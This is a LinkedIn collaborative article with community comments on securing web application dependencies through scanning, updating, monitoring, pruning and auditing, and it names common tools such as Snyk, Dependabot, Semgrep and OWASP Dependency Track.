Last updated on Mar 23, 2024
- All
- Engineering
- Web Applications
Powered by AI and the LinkedIn community
1
Scan your dependencies regularly
2
Update your dependencies frequently
3
Use secure coding practices
4
Monitor your dependencies continuously
5
Remove unused or unnecessary dependencies
6
Audit your dependencies periodically
7
Here’s what else to consider
Web applications rely on various dependencies, such as libraries, frameworks, and packages, to provide functionality and performance. However, these dependencies can also introduce security risks if they are outdated, vulnerable, or malicious. How do you ensure web application dependencies are secure? Here are some best practices to follow.
Top experts in this article
Selected by the community from 11 contributions. Learn more
Earn a Community Top Voice badge
Add to collaborative articles to get recognized for your expertise on your profile. Learn more
- Farshid Sanei AppSec | DevSecOps | Product Security | Application Security Engineer @ Snapp! 1
1 Scan your dependencies regularly
One of the first steps to secure your web application dependencies is to scan them regularly for known vulnerabilities and issues. You can use tools like npm audit, Snyk, or Dependabot to automate this process and alert you of any problems. You should also review the source code, documentation, and reputation of your dependencies before adding them to your project.
Help others by sharing more (125 characters min.)
- Farshid Sanei AppSec | DevSecOps | Product Security | Application Security Engineer @ Snapp!
- Report contribution
Thanks for letting us know! You'll no longer see this contribution
When scanning dependencies, it's beneficial to consider their "reachability." Often, dependencies such as those listed in a Go project's go.mod file may include unused or unreachable packages. Scanning these can be superfluous, generating unnecessary noise within a DevSecOps framework. For this purpose, CDXGEN, an open-source tool, which has usage-detection ability, can be utilized to streamline the process.
Like Like Celebrate Support Love Insightful Funny 1 - Aleksandr Beketov ★ Information Security Lead, CISSP CISSP ➣ Information Security Lead ➣ Application Security ➣ Secure Coding ➣ DevSecOps ➣ Secure CI/CD
- Report contribution
Thanks for letting us know! You'll no longer see this contribution
You can scan and get a list of dependencies easily if you use simple mechanisms like maven, gradle, yarn.lock, requirements.txt for Python, and others. In case you have a custom build, you may find yourself in a situation where using one mechanism will not cover all the dependencies of the whole project. In this case, you need to use different analysis tools and aggregate the result into a vulnerability management system. For example, gather JavaScript and Python dependencies with Syft, maven dependencies with cyclonedx-maven-plugin and generate a single report in Dependency Track.
Like Like Celebrate Support Love Insightful Funny -
- Report contribution
Thanks for letting us know! You'll no longer see this contribution
The important to have visibility on all your dependencies and security weaknesses is to scan the dependencies as soon as they exist in the Software Development Life Cycle. However, the crucial metric to ensure the dependencies can have repeated scanning is to measure the mean time between two scanning reports, or in short the scan result should have an expiry.Another critical measure is the Coverity between dependencies that got scanned and the dependencies that existed in the source code, in all software repositories that we're protecting
Like Like Celebrate Support Love Insightful Funny
2 Update your dependencies frequently
Another way to ensure web application dependencies are secure is to update them frequently to the latest versions. This will help you patch any security holes, fix any bugs, and improve any performance issues. However, you should also test your updates before deploying them to avoid breaking your web application or introducing new vulnerabilities. You can use tools like npm outdated, yarn upgrade, or pip list to check for outdated dependencies and update them accordingly.
Help others by sharing more (125 characters min.)
- Aleksandr Beketov ★ Information Security Lead, CISSP CISSP ➣ Information Security Lead ➣ Application Security ➣ Secure Coding ➣ DevSecOps ➣ Secure CI/CD
- Report contribution
Thanks for letting us know! You'll no longer see this contribution
It is good practice to store the update as an artifact in a secure perimeter from where it will be picked up by the software when it is built. It is important to run security tests and review the software's behaviour after the update to ensure that the update does not introduce new vulnerabilities or undeclared features. If no new vulnerabilities are detected, you can update and go into production.
Like Like Celebrate Support Love Insightful Funny -
- Report contribution
Thanks for letting us know! You'll no longer see this contribution
This is an easy statement from a security standpoint. However, it's not an easy task for developers at all. So to uplift, you need to implement a dependency manager into your environment to help check and suggest the up-to-date version of dependency to the developers so that they can do their best - code review and make the next stepsHowever, OSS dependencies are community efforts and depend a lot on its maintainers. To prevent the situation where the dependency is not maintainable, support from maintainers and contributors. There is a necessary control to measure the dependencies to help with the answers: Are the dependencies secure and healthy enough to use, supported by active contributors and frequency release updates?
Like Like Celebrate Support Love Insightful Funny
3 Use secure coding practices
A third way to ensure web application dependencies are secure is to use secure coding practices when working with them. This means following the principle of least privilege, limiting the access and permissions of your dependencies to the minimum required. It also means sanitizing and validating any user input, output, or data that interacts with your dependencies to prevent injection attacks, cross-site scripting, or data leakage. You can use tools like ESLint, Prettier, or PyLint to enforce coding standards and detect any errors or vulnerabilities in your code.
Help others by sharing more (125 characters min.)
- Aleksandr Beketov ★ Information Security Lead, CISSP CISSP ➣ Information Security Lead ➣ Application Security ➣ Secure Coding ➣ DevSecOps ➣ Secure CI/CD
- Report contribution
Thanks for letting us know! You'll no longer see this contribution
Programs like ESLint, Prettier, or PyLint belong to the linter class. That means that they check code quality rather than its safety. For safety checks, it is better to use SAST analysers. Among free ones you may try Semgrep. On Semgrep Playground there is a large choice of rules for different languages and frameworks.
Like
4 Monitor your dependencies continuously
A fourth way to ensure web application dependencies are secure is to monitor them continuously for any changes, anomalies, or incidents. You can use tools like GitHub Dependents, npm trends, or PyPI Stats to track the usage, popularity, and activity of your dependencies and identify any red flags or issues. You can also use tools like Sentry, New Relic, or Datadog to monitor the performance, availability, and reliability of your web application and its dependencies and alert you of any problems or anomalies.
Help others by sharing more (125 characters min.)
- Aleksandr Beketov ★ Information Security Lead, CISSP CISSP ➣ Information Security Lead ➣ Application Security ➣ Secure Coding ➣ DevSecOps ➣ Secure CI/CD
- Report contribution
Thanks for letting us know! You'll no longer see this contribution
You can use the free OWASP Dependency Track to track vulnerabilities in your dependencies. It allows you to get information about new vulnerabilities every day from NVD, Gihub and other databases.
Like Like Celebrate Support Love Insightful Funny
5 Remove unused or unnecessary dependencies
A fifth way to ensure web application dependencies are secure is to remove any unused or unnecessary dependencies from your project. This will help you reduce the attack surface, the complexity, and the maintenance burden of your web application. It will also help you avoid any conflicts, compatibility issues, or duplication of functionality among your dependencies. You can use tools like depcheck, webpack-bundle-analyzer, or pipdeptree to analyze your dependency tree and identify any unused or unnecessary dependencies and remove them safely.
Help others by sharing more (125 characters min.)
-
- Report contribution
Thanks for letting us know! You'll no longer see this contribution
A lot of unused and unnecessary dependencies can cause noise in dependencies vulnerability assessment and cost a lot of effort to remediate. The easiest way to help reduce is always to remove them as we don't need them. There are a few tools to help scan the source code to identify the dependencies imported but not in use to remove
Like Like Celebrate Support Love Insightful Funny
6 Audit your dependencies periodically
A sixth way to ensure web application dependencies are secure is to audit them periodically for any compliance, licensing, or quality issues. You can use tools like FOSSA, License Finder, or Black Duck to scan your dependencies for any license violations, legal risks, or policy conflicts. You can also use tools like SonarQube, Code Climate, or Codacy to scan your dependencies for any code quality, code smell, or technical debt issues. You should also review your dependency management strategy and policies regularly and update them as needed.
Help others by sharing more (125 characters min.)
- Aleksandr Beketov ★ Information Security Lead, CISSP CISSP ➣ Information Security Lead ➣ Application Security ➣ Secure Coding ➣ DevSecOps ➣ Secure CI/CD
- Report contribution
Thanks for letting us know! You'll no longer see this contribution
You can use the free OWASP Dependency Track to get information about dependency licence terms.It is good practice to store the update as an artifact in a secure perimeter from where it will be picked up by the software when it is built. It is important to run security tests and review the behaviour of the software after the update to ensure that the update does not introduce new vulnerabilities or undeclared features.
Like Like Celebrate Support Love Insightful Funny -
- Report contribution
Thanks for letting us know! You'll no longer see this contribution
Set up a measured approach and metrics to ensure we can effectively audit the dependencies periodically:How much time does it take for your dependencies can scan against the latest vulnerability database?Mechanism to ensure 100% dependencies within the code are inventoried and scanned?Mean time between two scan results?
Like Like Celebrate Support Love Insightful Funny
7 Here’s what else to consider
This is a space to share examples, stories, or insights that don’t fit into any of the previous sections. What else would you like to add?
Help others by sharing more (125 characters min.)
-
- Report contribution
Thanks for letting us know! You'll no longer see this contribution
Dependencies security management and Application Security is a team play efforts. And your teammate not only security guys but also developer guys. So the key to accelerating the program is to ensure we reduce the feedback loop as much as possible, and developer friendly so that we can focus on mitigation actionsTrying to measure everything in a data-driven approach so that we can identify where is the gaps and periodically improve the program
Like Like Celebrate Support Love Insightful Funny
Web Applications
Web Applications
+ Follow
Rate this article
We created this article with the help of AI. What do you think of it?
It’s great It’s not so great
Thanks for your feedback
Your feedback is private. Like or react to bring the conversation to your network.
Tell us more
Tell us why you didn’t like this article.
If you think something in this article goes against our Professional Community Policies, please let us know.
We appreciate you letting us know. Though we’re unable to respond directly, your feedback helps us improve this experience for everyone.
If you think this goes against our Professional Community Policies, please let us know.
More articles on Web Applications
No more previous content
- Balancing user experience and security in web applications: Are you willing to compromise one for the other? 1 contribution
- Struggling to meet client timelines for web app changes?
- You're drowning in vague and contradictory user feedback. How can you turn it into actionable insights?
- You're integrating third-party APIs with developers. How do you ensure seamless collaboration for success?
- Struggling to align stakeholders in web app projects?
- Your web application is at risk of a data breach. How will you handle the suspected breach effectively?
- Your web app is slowing down due to excessive third-party APIs. How will you optimize its performance?
- Balancing feature requests and project timelines in Web Applications: Feeling overwhelmed? 7 contributions
- You're faced with a complex web application project. How can you effectively prioritize testing tasks? 1 contribution
No more next content
Explore Other Skills
- Programming
- Web Development
- Machine Learning
- Software Development
- Computer Science
- Data Engineering
- Data Analytics
- Data Science
- Artificial Intelligence (AI)
- Cloud Computing
More relevant reading
- Network Security How do you manage and update your web application dependencies and libraries?
- Software Engineering What is the role of APIs in web application architecture?
- Web Development What are the best tips for debugging your web development project using server logs?
- Computer Science How can you troubleshoot web application deployment with NGINX?
